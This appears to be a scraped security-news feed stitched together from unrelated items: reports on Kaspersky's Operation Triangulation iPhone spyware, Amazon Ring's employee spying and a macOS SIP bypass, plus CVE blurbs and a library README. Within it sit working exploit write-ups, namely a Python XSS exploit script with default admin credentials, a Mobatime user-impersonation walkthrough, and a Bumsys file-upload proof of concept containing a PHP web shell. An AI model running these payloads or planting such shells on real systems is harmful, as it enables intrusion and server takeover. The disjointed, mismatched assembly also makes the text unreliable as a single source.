By Waqas
The researchers discovered the oldest traces of infection in 2019, and it is believed that the attack is still active.
This is a post from HackRead.com Read the original post: Kaspersky Reveals iPhones of Employees Infected with Spyware

According to Kaspersky, this is an ongoing investigation, and the perpetrators are yet to be determined.

The CEO of cybersecurity giant and antivirus vendor Kaspersky, Eugene Kaspersky, revealed in a blog post that dozens of iPhones used by their senior employees contained spyware capable of recording audio, capturing images from messaging apps, geolocation, and more.

The company noted that iOS devices on its WiFi network had become targets of threat actors who launched zero-day exploits as part of Operation Triangulation. The researchers discovered the oldest traces of infection in 2019, and it is believed that the attack is still active.

****How Was the Activity Discovered?****

Kaspersky researchers noted suspicious activity on several iPhones while monitoring network traffic for mobile devices on their corporate WiFi network through the KUMA (Kaspersky Unified Monitoring and Analysis) platform.

To investigate further, they created offline backups of these devices since they couldn’t inspect them from the inside and discovered an infection using the Mobile Verification Toolkit’s mvt-ios. This utility provides information about the sequence of events, allowing researchers to recreate the incident.

****Digging Deeper…****

The attack begins with iOS phone users receiving an iMessage with an attachment that contains the exploit. Upon clicking, it triggers a vulnerability that leads to code execution without involving user input, making it a zero-click attack.

The malicious code downloads new payloads after connecting with the C2 server, which can include privilege escalation exploits. The final payload is a feature-rich APT platform.

“The analysis of the final payload is not finished yet. The code is run with root privileges, implements a set of commands for collecting system and user information, and can run arbitrary code downloaded as plugin modules from the C&C server,” the researchers wrote in their blog post.

****Various Vulnerabilities Used to Get Deeper Access****

Multiple vulnerabilities are combined to allow attackers deeper access to the compromised device. Once the final payload is downloaded, the message and the malicious attachments initiate self-deletion. The malware cannot maintain persistence if the device is rebooted, but researchers observed reinfection in some samples.

The exact nature of the bugs used in this attack chain is unclear, but one of the flaws could be the kernel extension vulnerability (CVE-2022-46690) patched by Apple in December 2022.

****Apple’s Response****

Kaspersky’s findings were published the same day the Russian security services released a statement blaming the US for exploiting Apple devices to launch reconnaissance operations.

“Several thousand telephone sets of this brand were infected….. In addition to domestic subscribers, facts of infection of foreign numbers and subscribers using SIM cards registered with diplomatic missions and embassies in Russia, including the countries of the NATO bloc and the post-Soviet space, as well as Israel, SAR, and China, were revealed,” Russian intelligence claimed.

However, Apple’s spokesperson refuted these allegations, stating that none of their products have ever contained a backdoor, and Apple would never collaborate with governments.

Regarding Kaspersky’s report, Apple stated that the issue was detected in some versions of iPhones (iOS version 15.7 and below), whereas currently, iOS devices run version 16.5.

Patrick Wardle, an iOS and macOS security researcher, told Wired that Kaspersky remained hacked by an iOS zero-day exploit for five years, and the issue has been discovered now, indicating that it is pretty challenging to detect zero-day exploits.

Kaspersky noted that this difficulty is caused by iOS’s locked-down design, making it tough to inspect iOS’s activities. This is an ongoing investigation, and the perpetrators are yet to be determined. Stay tuned for an update…

**RELATED ARTICLES**

1.  Israel hacked Kaspersky Labs
2.  Kaspersky spots CIA malware
3.  US: Kaspersky is a national security threat
4.  WikiLeaks’ Vault 8: CIA Impersonated Kaspersky Lab
5.  Kaspersky Reveal How NSA Hacking Tools Were Stolen

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Kaspersky Reveals iPhones of Employees Infected with Spyware

Incorrect Authorization vulnerability in Mobatime web application allows Privilege Escalation, Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mobatime web application: through 06.7.22.



This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnerability allows an authenticated user to impersonate another one, possibly having more privileges.

This application is essentially a single page, and the pieces of information are retrieved through AJAX calls. To get adequate pieces of information, the requests carry the user identifier, in order to fetch data related to them. The issue is that this identifier is controlled by the user, and the request body is not protected. It is therefore possible to change this identifier, and impersonate someone else.

A typical AJAX call is as follows:

    POST /Webengine/api/ajax_api.aspx HTTP/1.1 Accept: */*
    Accept-Encoding: gzip, deflate, br
    ... snipped ...
    Sec-GPC: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0
    Safari/537.36 X-Requested-With: XMLHttpRequest
    
    @64eyJhcnJheV9pbnQiOltdLCJmdW5jdGlvbiI6NTA3LCJpcGFyYW0xIjoxNTQsImlwYX
    JhbTEwIjowLCJpcGFyYW0xMSI6MCwiaXBhcmFtMTIiOjAsImlwYXJhbTEzIjowLCJpcGF
    yYW0xNCI6MCwiaXBhcmFtMTUiOjAsImlwYXJhbTIiOjg0MTUsImlwYXJhbTMiOjAsImlw
    YXJhbTQiOjAsImlwYXJhbTUiOjAsImlwYXJhbTYiOjAsImlwYXJhbTciOjAsImlwYXJhb
    TgiOjAsImlwYXJhbTkiOjAsImxwYXJhbTEiOjAsInBhcmFtMSI6IiIsInBhcmFtMiI6Ii
    IsInBhcmFtMyI6IiIsInBhcmFtNCI6IiIsInBhcmFtNSI6IiIsInRva2VuIjowfQ==
    

One can recognise here a base64-encoded JSON (prefix eyJ), which gives us, once decoded:

    {
        "array_int":[],
        "function":507,
        "iparam1":154,
        "iparam10":0,
        "iparam11":0,
        "iparam12":0,
        "iparam13":0,
        "iparam14":0,
        "iparam15":0,
        "iparam2":8415,
        "iparam3":0,
        "iparam4":0,
        "iparam5":0,
        "iparam6":0,
        "iparam7":0,
        "iparam8":0,
        "iparam9":0,
        "lparam1":0,
        "param1":"",
        "param2":"","
        param3":"",
        "param4":"",
        "param5":"",
        "token":0
    }
    

Now, let’s assume that our ID is 154, and that we want to impersonate 155. Keen eye may see that the payload is not signed, hence forgeable. Since the application is a singe page, it was likely that this value 154 was carried by a JS variable, and that we could change it in a single place. All subsequent AJAX calls would probably embed the modified ID, and make us act as 155.

**Hunting the identifier**

Analysing the traffic reveals that the AJAX requests originate from a call to the routine Get in the file MobaBridge3.js. One can suppose here that this routine probably deals with the JSON payload so as to authenticated the request:

A breakpoint was therefore put at line 1’316, before the function end. Refreshing the page reveals that the attribute this._param holds the value 154. It comes from the second argument (param). Since the value 154 was already known there, one can step over LaunchThread to get back to the calling routine ($ctor1).

In this routine, a call to Get is indeed performed, and the second argument containing the identifier is referred to as s. The variable s is obtained thanks to a call to JsonConvert.SerializeObject, hence was likely to be built based on the variable function (line 17). The latter is passed as argument (line 13), and to analyse it, one should once again climb up the calling stack.

The caller lies in the class MensualView.cs, where the func variable is initialised (passed as function). It is worth noting that one of the attributes of func is named iparam1, just like the attribute carrying the identifier in the JSON stream. Its value is held by the attribute Workflow.pid. By looking where such variable is set thanks to a regular expression, only two results are returned. One of them lies on the class LoginLinkWorkflow.cs

By putting a breakpoint at line 139 and refreshing the page, the breakpoint is hit. The value of the variable PId could be turn into 155, and letting the execution flow continue normally, and the page would be rendered as if we were 155.

**Conclusion**

Since only the advertised identifier seems to be used to verify the authorisations, a malicious user could trick the application into thinking that they are someone else by changing their ID on the client side. Since the server trusts this ID, they would serve inappropriate content. The server should use server-side variables to store the ID of a user, based on a session identifier. An alternative could make use of signed JWTs to make them inalterable.

*   **2023** 6
*   **2020** 12

**2023**

**CVE-2023-3033**

3 minute read

This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnera...

**CVE-2023-3032**

less than 1 minute read

Mobatime offers various time-related products, such as check-in solutions. In versions up to 06.7.2022, an arbitrary file upload allowed an authenticated use...

**CVE-2023-3031**

less than 1 minute read

King-Avis is a Prestashop module developed by Webbax. In versions older than 17.3.15, the latter suffers from an authenticated path traversal, leading to loc...

**FuckFastCGI made simpler**

3 minute read

Let’s render unto Caesar the things that are Caesar’s, the exploit FuckFastCGI is not mine and is a brilliant one, bypassing open\_basedir and disable\_functio...

**PHP .user.ini risks**

4 minute read

I have to admit, PHP is not my favourite, but such powerful language sometimes really amazes me. Two days ago, I found a bypass of the directive open\_basedir...

**PHP open\_basedir bypass**

3 minute read

PHP is a really powerful language, and as a wise man once said, with great power comes great responsibilities. There is nothing more frustrating than obtaini...

Back to Top ↑

**2020**

**Self modifying C program - Polymorphic**

17 minute read

A few weeks ago, a good friend of mine asked me if it was possible to create such a program, as it could modify itself. After some thoughts, I answered that ...

Back to Top ↑

CVE-2023-3033: CVE-2023-3033

On the same day, Russia’s FSB intelligence service launched wild claims of NSA and Apple hacking thousands of Russians.

The Moscow-based cybersecurity firm Kaspersky has made headlines for years by exposing sophisticated hacking by Russian and Western state-sponsored cyberspies alike. Now it’s exposing a stealthy new intrusion campaign where Kaspersky itself was a target.

In a report published today, Kaspersky said that at the beginning of the year, it detected targeted attacks against a group of iPhones after analyzing the company’s own corporate network traffic. The campaign, which the researchers call Operation Triangulation and say is “ongoing,” appears to date back to 2019 and utilized multiple vulnerabilities in Apple’s iOS mobile operating system to let attackers take control of victim devices.

Kaspersky says the attack chain utilized “zero-click” exploitation to compromise targets’ devices by simply sending a specially crafted message to victims over Apple’s iMessage service. Victims received the message, which included a malicious attachment, and exploitation would begin whether victims opened the message and inspected the attachment or not. Then the attack would chain together multiple vulnerabilities to give the hackers deeper and deeper access to the target’s device. And the final malware payload would automatically download to the victim’s device before the original malicious message and attachment self-deleted.

Kaspersky’s revelation of the new iOS hacking campaign comes on the same day that Russia’s FSB intelligence service separately announced a claim that the US National Security Agency has hacked thousands of Russians’ phones. Even more remarkably, the FSB claimed that Apple had participated in that broad hacking of iOS devices, willingly providing vulnerabilities to the NSA to exploit in its spying operations.

Apple said in a statement to WIRED, “We have never worked with any government to insert a backdoor into any Apple product and never will.”

When asked about Kaspersky’s report, an Apple spokesperson noted that the findings only appear to pertain to iPhones running iOS version 15.7 and below. The current version of iOS is 16.5.

Kaspersky says that the malware it discovered cannot persist on a device once it is rebooted, but the researchers say they saw evidence of reinfection in some cases. The exact nature of the vulnerabilities used in the exploit chain remains unclear, though Kaspersky says that one of the flaws was likely the kernel extension vulnerability CVE-2022-46690 that Apple patched in December. 

Zero-click vulnerabilities can exist on any platform, but in recent years, attackers and spyware vendors have focused on finding these flaws in Apple’s iOS, often in iMessage, and exploiting them to launch targeted attacks on iPhones. This is partly because services like iMessage present unusually fertile ground within iOS for discovering vulnerabilities, but also because attacks on iOS devices with this approach are often very difficult for victims to detect.

“Kaspersky, arguably one of the best exploit detection companies in the world, was potentially hacked via an iOS zero-day for five years, and it was only discovered now,” says longtime macOS and iOS security researcher Patrick Wardle. “That shows how ridiculously hard it is to detect these exploits and attacks.”

In their report, the Kaspersky researchers point out that one of the reasons for this difficulty is iOS’s locked-down design, which makes it very tough to inspect the operating system’s activity.

“The security of iOS, once breached, makes it really challenging to detect these attacks,” says Wardle, who was formerly an NSA staffer. At the same time, he adds that attackers would need to assume any brazen campaign to target Kaspersky would eventually be discovered. “In my opinion, this would be sloppy for an NSA attack,” he says. “But it shows that either hacking Kaspersky was incredibly valuable for the attacker or that whoever this was likely has other iOS zero days as well. If you only have one exploit, you’re not going to risk your only iOS remote attack to hack Kaspersky.”

The NSA declined WIRED’s request for comment on either the FSB announcement or Kaspersky’s findings.

With the release of iOS 16 in September 2022, Apple introduced a special security setting for the mobile operating system known as Lockdown Mode that intentionally restricts usability and access to features that can be porous within services like iMessage and Apple’s WebKit. It is not known whether Lockdown Mode would have prevented the attacks Kaspersky observed.

The Russian government’s purported discovery of Apple’s collusion with US intelligence “testifies to the close cooperation of the American company Apple with the national intelligence community, in particular the US NSA, and confirms that the declared policy of ensuring the confidentiality of personal data of users of Apple devices is not true,” claims an FSB statement, which adds that it would allow the NSA and “partners in anti-Russian activities” to target “any person of interest to the White House,” as well as US citizens.

The FSB statement wasn’t accompanied by any technical details of the described NSA spy campaign, or any evidence that Apple colluded in it.

Apple has historically resisted pressure to provide a “backdoor” or other vulnerability to US law enforcement or intelligence agencies. That stance was demonstrated most publicly in Apple’s high-profile 2016 showdown with the FBI over the bureau’s demand that Apple assist in the decryption of an iPhone used by San Bernadino mass shooter Syed Rizwan Farook. The standoff only ended when the FBI found its own method of accessing the iPhone’s storage with the help of Australian cybersecurity firm Azimuth.

Despite its announcement coming on the same day as the FSB’s claims, Kaspersky has so far made no claims that the Operation Triangulation hackers who targeted the company were working on behalf of the NSA. Nor has the cybersecurity firm attributed the hacking to the Equation Group, Kaspersky’s name for the state-sponsored hackers it has previously tied to highly sophisticated malware, including Stuxnet and Duqu, tools widely believed to have been created and deployed by the NSA and US allies.

Kaspersky did say in a statement to WIRED that, “Given the sophistication of the cyberespionage campaign and the complexity of analysis of the iOS platform, further research will surely reveal more details on the matter.”

US intelligence agencies and US allies would, of course, have plenty of reason to want to look over Kaspersky’s shoulder. Aside from years of warnings from the US government that Kaspersky has ties to the Russian government, the company’s researchers have long demonstrated their willingness to track and expose hacking campaigns conducted by Western governments that Western cybersecurity firms don’t. In 2015, in fact, Kaspersky revealed that its own network had been breached by hackers who used a variant of the Duqu malware, suggesting a link to the Equation Group—and thus potentially the NSA.

That history, combined with the sophistication of the malware that targeted Kaspersky, suggests that as wild as the FSB’s claims may be, there’s good reason to imagine that Kaspersky’s intruders could have ties to a government. But if you hack one of the world’s most prolific trackers of state-sponsored hackers—even with seamless, tough-to-detect iPhone malware—you can expect, sooner or later, to get caught.

Kaspersky Says New Zero-Day Malware Hit iPhones—Including Its Own

Online Security Guards Hiring System version 1.0 suffers from a cross site scripting vulnerability.

    #Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS #Google Dork : NA#Date: 23-01-2023#Exploit Author : AFFAN AHMED#Vendor Homepage: https://phpgurukul.com#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip#Version: 1.0#Tested on: Windows 11 + XAMPP + PYTHON-3.X#CVE : CVE-2023-0527#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT# Below code check for both the parameter /admin-profile.php and in /search.php#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.mdimport requests import re from colorama import Foreprint(Fore.YELLOW + "######################################################################" + Fore.RESET)print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)print(Fore.YELLOW +"######################################################################" + Fore.RESET)print()print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)print()# NAVIGATING TO ADMIN LOGIN PAGEWebsite_url = "http://localhost/osghs/admin/login.php"    # CHANGE THE URL ACCORDING TO YOUR SETUPprint(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}headers = {    'Content-Type': 'application/x-www-form-urlencoded',    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',    'Referer': 'http://localhost/osghs/admin/login.php',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9',    'Connection': 'close',    'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-User': '?1',    'Sec-Fetch-Dest': 'document'}response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)if response.status_code == 200:    location = re.findall(r'document.location =\'(.*?)\'',response.text)    if location:        print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)        print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )    else:        print(Fore.GREEN + "> document.location not found"+ Fore.RESET)else:    print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter  [**]" + Fore.RESET)# NAVIGATING TO ADMIN PROFILE SECTION  TO UPDATE ADMIN PROFILE # INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETERWebsite_url= "http://localhost/osghs/admin/admin-profile.php"   # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""payload = {    "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>",      # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE    "username": "admin",                                                      # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE    "mobilenumber": "8979555558",    "email": "admin@gmail.com",    "submit": "",}# SENDING THE RESPONSE WITH POST REQUESTresponse = requests.post(Website_url, headers=headers, data=payload)print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX if response.status_code == 200:    scripts = re.findall(r'<script>alert$.*?$</script>', response.text)    print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)     print(Fore.GREEN+">"+Fore.RESET,scripts)exploit.pyDisplaying exploit.py.

Online Security Guards Hiring System 1.0 Cross Site Scripting

Bumsys Business Management System version 1.0.3-beta suffers from a remote shell upload vulnerability.

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload  
Google Dork : NA  
Date: 19-01-2023  
Exploit Author: AFFAN AHMED  
Vendor Homepage: https://github.com/unilogies/bumsys  
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip  
Version: 1.0.3-beta  
Tested on: Windows 11, XAMPP-8.2.0  
CVE : CVE-2023-0455

================================  
Steps_TO_Reproduce  
================================  
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)  
- Click on action button to edit the Profile  
- Click on select logo button to upload the image  
- Intercept the POST Request  and do the below changes .

================================================================  
Burpsuite-Request  
================================================================  
POST /xhr/?module=settings&page=updateShop HTTP/1.1  
Host: demo.bumsys.org  
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7  
Content-Length: 1280  
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"  
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.bumsys.org  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.bumsys.org/settings/shop-list/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopName"

TEST  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopAddress"

 test   
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCity"

testcity  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopState"

teststate  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPostalCode"

700056  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCountry"

testIND  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPhone"

895623122  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopEmail"

test@gmail.com  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopInvoiceFooter"

 ------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"  
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>

====================================================================================  
Burpsuite-Response  
====================================================================================  
HTTP/1.1 200 OK  
Date: Thu, 19 Jan 2023 07:14:26 GMT  
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips  
X-Powered-By: PHP/7.0.33  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>

====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ

Bumsys Business Management System 1.0.3-beta Shell Upload

mp4v2 v2.1.3 was discovered to contain a memory leak via MP4SdpAtom::Read() at atom_sdp.cpp

**MP4v2 - _A C/C++ library to create, modify and read MP4 files_**

 

This is the _new_ MP4v2 project, a fork of the abandoned MP4v2 library project now archived at Google Code.

The MP4v2 library provides an API to create and modify MP4 files as defined by ISO-IEC:14496-1:2001 MPEG-4 Systems. This file format is derived from Apple's QuickTime file format that has been used as a multimedia file format in a variety of platforms and applications. It is a very powerful and extensible format that can accommodate practically any type of media.

Please visit mp4v2.org for more information about this project and its goals.

**License**

MP4v2 is released under the terms of the Mozilla Public License (MPL) Version 1.1. Please refer to the COPYING file for the full license text.

**Download**

Release packages of the MP4v2 library sources are available in the _Releases_ area.

**Building**

The MP4v2 library and utilities can be built using the following build systems:

*   **GNU Autotools**
    
    1.  Run autoreconf -i in the MP4v2 project base folder (only necessary when building directly from repository sources)
    2.  Run ./configure && make in the MP4v2 project base folder
*   **CMake**
    
    *   Run cmake . && make in the MP4v2 project base folder
*   **Visual Studio**
    
    *   Use the Visual Studio solution at vstudio/mp4v2.sln
*   **Xcode**
    
    *   Use the Xcode project at xcode/mp4v2.xcodeproj

MP4v2 has no special dependencies other than a working C++ compiler and build environment.

**Support**

Please use the _Issues_ area to report bugs and other issues or make feature requests. For questions and general discussion, please use the _Discussions_ area.

If you need to contact the maintainer, please send an email to support@mp4v2.org.

CVE-2023-33719: GitHub - enzo1982/mp4v2: Reviving the MP4v2 project...

Categories: News
Categories: Personal
It's what we all feared, but hoped wouldn't be the case.



(Read more...)




The post Amazon's Ring cameras were used to spy on customers appeared first on Malwarebytes Labs.

Every single Amazon Ring employee was able to access every single customer video, even when it wasn't necessary for their jobs. 

Not only that, but the employees—along with workers from a third-party contractor in Ukraine—could also download any of those videos and then save and share them as they liked, before July 2017.

That's what the FTC has alleged in a recent complaint, for which Amazon is facing a settlement of $5.8 million.

And, unsurprisingly, some employees abused that access right. 

In one example, the FTC says a Ring employee viewed thousands of videos from at least 81 different female users. The employee allegedly went looking for camera feeds that suggested they may have been used in the most private of areas, such as "Master Bedroom," "Master Bathroom," and "Spy cam". 

Between June and August 2017, the employee looked through the videos for at least an hour a day on hundreds of occasions. Another employee noticed and reported it to their supervisor who allegedly told them that it was "normal" for an engineer to view so many accounts.

From the FTC complaint:

> "Only after the supervisor noticed that the male employee was only viewing videos of “pretty girls” did the supervisor escalate the report of misconduct. Only at that point did Ring review a portion of the employee’s activity and, ultimately, terminate his employment."

As a result of that incident, Ring narrowed its employees' access rights in September 2017, so that customers had to consent to customer service agents accessing their videos. However, Ring continued to allow hundreds of other employees and third-party contractors access to all video data, regardless of whether they actually needed it in order to perform their jobs.

So, then, more abuse of that access occurred. In January 2018, a male employee used his access rights to spy on a female colleague's videos, looking her up using her email address.

In February 2018, employee access rights were narrowed further, with engineers (both employees and third-party contractors) only given access to customer videos if there was a business need. Videos used for research and development were limited to those posted by customers to Ring’s Neighbors app, and those for which employees, contractors, and their friends and family had given their written consent for such use.

In Februrary 2019, Ring changed its access practices again so that most Ring employees or contractors could only access a customer’s private video with that customer’s consent.

The FTC lists several further examples of access abuse and spying. According to the complaint, Ring actually has no idea how much inappropriate access went on, because there were no detection measures in place:

> "Importantly, because Ring failed to implement basic measures to monitor and detect inappropriate access before February 2019, Ring has no idea how many instances of inappropriate access to customers’ sensitive video data actually occurred.”

Bad apples aside, before May 2018 Ring also wasn't conducting any employee training on privacy or data security, despite the fact that the company was collecting huge amounts of highly sensitive data. Nor did it advise employees or third-party contractors that customer video data was sensitive and should be treated as such.

Customers had no idea their video was able to be accessed by so many employees. The FTC says that before December 2017, Ring’s Terms of Service and Privacy Policy didn't say Ring employees and contractors would have the right to review all video recordings for product improvement and development:

> In the middle of lengthy terms dense with legalese, Ring merely described the company’s right to use recordings obtained in connection with Ring’s (then called Doorbot’s) cloud service for product improvement and development. 

The FTC says Ring also failed to implement basic security measures to protect users from threats such as credential stuffing and brute force attacks, despite warnings from employees and external security researchers, nor did it implement multi-factor authentication (MFA) until May 2019, long after many competitors had done so.

As a result of these bad practices, Ring suffered several security incidents. Between January 2019 and March 2020, the FTC alleges that more than 55,000 customers had their Ring devices compromised. In some instances cybercriminals used the two-way communication to terrorise Ring customers, like something from a horror movie:

*   Several women lying in bed heard hackers curse at them
*   Several children had racist slurs thrown at them
*   An elderly woman in an assisted living facility was sexually propositioned and physically threatened
*   A digital intruder told a woman through her camera that they had killed her mother, and then said: "Tonight you die"
*   A woman was told her location was being tracked and that her device would self-destruct at the end of a countdown. She disconnected the device before the countdown ended.

Aside from the fine, Ring has been ordered to delete any customer videos and data collected from an individual’s face—known as “face embeddings”—that Ring obtained before 2018. Ring must also delete any work products it derived from the videos.

**Children's privacy**

In a separate settlement announced the same day, Amazon agreed to pay $25 million for failing to protect children's privacy. 

The Department of Justice filed the complaint and proposed settlement on behalf of the FTC. The complaint alleged that Amazon kept Alexa voice and geolocation information associated with young users for years while preventing parents from using their rights to delete their kids’ data under the Children's Online Privacy Protection Act (COPPA) rule.

The FTC said in a post that kids’ speech patterns could have been especially valuable to Amazon since they differ from those of adults:

> "Children’s speech patterns are markedly different from adults, so Alexa’s voice recordings gave Amazon a valuable data set for training the Alexa algorithm and further Amazon’s commercial interest in developing new products."

Alongside the $25 million settlement, Amazon will be banned from using children's voice information and geolocation data for creating or improving a data product. It must also delete inactive child accounts on Alexa, and notify users about the government action against the company and of its retention and deletion practices.

Additionally, Amazon will have to implement a privacy program to govern its use of geolocation information.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Amazon's Ring cameras were used to spy on customers

Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  macOS

Tags:  Ventura 13.4

Tags:  Monterey 12.6.6

Tags:  Big Sur 11.7.7

Tags:  libxpc

Tags:  SIP

Tags:  XPC

Tags:  NVRAM

Tags:  CVE-2023-32369

Tags:  Migraine

Microsoft has released details about a vulnerability that can bypass macOS's System Integrity Protection



(Read more...)




The post Microsoft gives Apple a migraine appeared first on Malwarebytes Labs.

On May 18, 2023, Apple published security content for macOS Ventura 13.4, macOS Monterey 12.6.6, and macOS Big Sur 11.7.7 that addressed a logic issue in libxpc.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE we are going to discuss is listed as CVE-2023-32369, which allows an app to modify protected parts of the macOS file system.

At the time there were no other details provided. This is usual and done to give users ample time to implement the necessary patches. But now Microsoft has published a blogpost that provides details about the vulnerability and how it was discovered during a routine malware hunt.

The updates may already have reached you in your regular update routines, but it doesn't hurt to check if your device is at the latest update level. If not, you can follow the instructions on how to update macOS on Mac.

**libxpc** is a closed source project that is part of XPC, which is the enhanced inter-process communication (IPC) framework used in macOS/iOS. In computer science, IPC refers specifically to the mechanisms an operating system provides to allow processes to manage shared data.

One of the security related functions of **libxpc** is System Integrity Protection (SIP). SIP is a security technology designed to help prevent potentially malicious software from modifying protected files and folders on your Mac. System Integrity Protection restricts the root user account and limits the actions that the root user can perform on protected parts of the Mac operating system. SIP is enabled by default on all modern macOS software releases.

This means that only certain processes—signed by Apple—have special entitlements to write to protected parts of macOS. This includes things like Apple software updates and Apple installers.

The Microsoft security engineers that are credited in the Apple security content however, found a flaw that allowed attackers with root permissions to add a malicious payload to SIP's exclusions list and launch it. Because they managed to pull this off by abusing the macOS Migration Assistant utility, they named the vulnerability Migraine.

Successfully exploiting this vulnerability would allow an attacker that had somehow managed to obtain root privileges to install a rootkit which would be protected by SIP. SIP can only be disabled by following this procedure:

1.  Restart your system in Recovery mode.
2.  Launch Terminal from the Utilities menu.
3.  Run the command _csrutil disable_.
4.  Restart your system.

Because SIP is controlled through the Mac’s NVRAM, enabling or disabling SIP affects all versions of the Mac operating system that are installed on the system. NVRAM (nonvolatile random-access memory) is a small amount of memory that your Mac uses to store certain settings and access them quickly.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Microsoft gives Apple a migraine

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit_BasicSSID interface at /goform/aspForm.

